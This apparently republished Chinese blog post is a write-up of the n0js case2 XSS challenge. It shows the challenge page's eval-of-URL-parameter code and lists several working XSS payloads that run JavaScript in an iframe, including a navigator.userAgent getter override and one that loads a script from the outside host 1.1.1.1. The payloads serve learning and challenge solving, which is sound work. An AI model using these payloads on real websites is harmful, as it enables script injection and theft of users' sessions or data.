記一次xss挑戰

時間  2019-11-21
標籤 一次 xss 挑戰 欄目 JavaScript 简体版
原文   原文鏈接

起始

一次看到一位大牛放出的一個xss挑戰頁面,在iframe頁面中執行xss即算完成.

地址: 
      http://server.n0tr00t.com/n0js/case2.html
標準:
      Please execute the jscode in the iframe(name=hi): prompt location.href
     Work: Chrome, Firefox

case2.html

<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <title>n0js case2</title>
  </head>
  <body style="margin: -10px 0px 0px 10px;">
    <h1>[n0js] case2</h1>
    <span>Please execute the jscode in the iframe(name=hi): prompt location.href</span><br>
    <span>Work: Chrome, Firefox</span><br>
    <span>Datetime: 2016-12-14</span>
        <ul>
            <li>Submit: evi1m0.bat[at]gmail.com</li>
            <li>Casetip: dota2 pudge</li>
            <li>Subject by: evi1m0 / server.n0tr00t.com</li>
        </ul>
        <hr>
        <script>
            eval(eval((window.location.search.substring(1).split("=")[1])));
        </script>
        <pre>
            <iframe name="hi" src="//server.n0tr00t.com/n0js/case2_test.html" style="width: 400px;height: 200px;"></iframe>
        </pre>
  </body>
</html>

case2_test.html

<script>
function getos() {
    var sUserAgent = navigator.userAgent;
    var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");
    var isMac = (navigator.platform == "Mac68K") || (navigator.platform == "MacPPC") || (navigator.platform == "Macintosh") || (navigator.platform == "MacIntel");
    if (isMac) return "Mac";
    var isUnix = (navigator.platform == "X11") && !isWin && !isMac;
    if (isUnix) return "Unix";
    var isLinux = (String(navigator.platform).indexOf("Linux") > -1);
    if (isLinux) return "Linux";
    if (isWin) {
        var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;
        if (isWin2K) return "Win2000";
        var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;
        if (isWinXP) return "WinXP";
        var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;
        if (isWin2003) return "Win2003";
        var isWinVista= sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;
        if (isWinVista) return "WinVista";
        var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;
        if (isWin7) return "Win7";
    }
    return "other";
}

document.write('OS:'+getos()+'<br>UA:'+window.parent.navigator.userAgent);
</script>

分析

1. case2.html中js取url地址「="後面的值傳入eval執行
2. 頁面先加載js,後加載的iframe
3. url傳入的參數帶單引號,雙引號都會被urlencode
4. case2_test.html提示userAgent或許可用
5. 開搞

解決

1. url應該是case2.html?test=payload
2. 使用延時執行js;修改瀏覽器的navigator.platform屬性;綁定監聽頁面load事件
3. url地址「#」後面的單雙引號等字符不會被編碼

case1: 延時加載js

解法一:
case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca
解法二:
case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)  // @fyth

case2: 修改瀏覽器屬性

解法一:
case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}})  //@gaoheby
解法二:
case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '<svg/onload=prompt(location.href)>'}) // @fyth

解法三:
case2.html?a=location.hash.substr(1)#var frame = document.createElement('iframe'); frame.style.display = 'none'; document.body.appendChild(frame); function navigator(){} window.navigator = new Proxy(window.frames[0].window.navigator, { get: function(n0t){return "<img src=@ onerror=alert(location.href)>";} })  // @evi1m0

解法四:
case2.html?a=location.hash.substr(1)#function createProperty(value){var _value=value;function _get(){return _value}function _set(v){_value=v}return{"get":_get,"set":_set}}; function makePropertyWritable(objBase,objScopeName,propName,initValue){var newProp,initObj;if(objBase&&objScopeName in objBase&&propName in objBase[objScopeName]) {if(typeof initValue==="undefined"){initValue=objBase[objScopeName][propName]}newProp=createProperty(initValue);try{Object.defineProperty(objBase[objScopeName],propName,newProp)} catch(e){initObj={};initObj[propName]=newProp;try{objBase[objScopeName]=Object.create(objBase[objScopeName],initObj)}catch(e){}}}}; makePropertyWritable(window,"navigator","userAgent"); window.navigator.userAgent="<script>prompt(location.href)</script>"; // 1124696276

case3: 綁定監聽頁面load屬性

case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})

最後

做者測試頁面:
    http://server.n0tr00t.com/n0js/
    上面幾個解法都來自此頁面,做者又放出了一個case,歡迎感興趣的去玩耍,多學習。

MDN的 JavaScript文檔: 
    https://developer.mozilla.org/zh-CN/docs/Web/JavaScript 
    好好學習每天向上,thx piaca & NorthOrchid。
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程